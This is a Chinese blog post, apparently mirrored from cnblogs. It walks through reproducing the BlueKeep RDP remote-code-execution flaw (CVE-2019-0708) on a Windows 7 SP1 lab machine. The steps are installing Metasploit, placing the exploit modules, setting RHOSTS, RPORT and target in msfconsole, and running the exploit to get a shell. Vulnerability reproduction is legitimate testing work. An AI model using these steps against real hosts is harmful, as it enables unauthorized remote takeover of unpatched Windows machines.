zoukankan      html  css  js  c++  java
  • CVE-2019-0708—微软RDP远程桌面代码执行漏洞复现

    0x01

    2019年9月7日凌晨,msf上更新了0708的漏洞利用程序。

    顿时安全群和朋友圈就爆炸了

    -

    奈何接到HW攻击队任务,又在家过了个中秋,0708才在今天更新。

    0x02 环境

    Windows 7 sp1

    Kali

    exp

    0x02 利用

    1.一键安装metasploit-framework

    curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

    2.下载Reference中的攻击套件放置文件到msf的相应文件夹

    rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
    rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
    cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
    cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

    msf命令:

    使用msfconsole进入metasploit-framework ,reload_all重新加载0708rdp利用模块

    CVE-2019-0708—微软RDP远程桌面代码执行漏洞复现

     

    使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce启用0708RDP攻击模块

    CVE-2019-0708—微软RDP远程桌面代码执行漏洞复现

     

    使用set RHOSTS 设置受害机IP

    CVE-2019-0708—微软RDP远程桌面代码执行漏洞复现

     

    使用set RPORT 设置受害机RDP端口号

    CVE-2019-0708—微软RDP远程桌面代码执行漏洞复现

     

    使用set target ID数字(可选为0-4)设置受害机机器架构

    我使用的是Parallels Desktop,设置target 1

    CVE-2019-0708—微软RDP远程桌面代码执行漏洞复现

     

    使用exploit开始攻击,等待建立连接

    CVE-2019-0708—微软RDP远程桌面代码执行漏洞复现

     

    建立连接以后,使用shell获得shell,再使用python获得交互式shell,执行whoami

    CVE-2019-0708—微软RDP远程桌面代码执行漏洞复现

     

  • 相关阅读:
    入门训练 圆的面积
    入门训练 序列求和
    interface
    Horizon
    H903
    Sphinx Building Docs in horizon
    Cinder Columns
    DevStack添加Swift
    Murano py27和py34的兼容处理
    Murano Weekly Meeting 2015.12.01
  • 原文地址:https://www.cnblogs.com/0daybug/p/11601670.html
Copyright © 2011-2022 走看看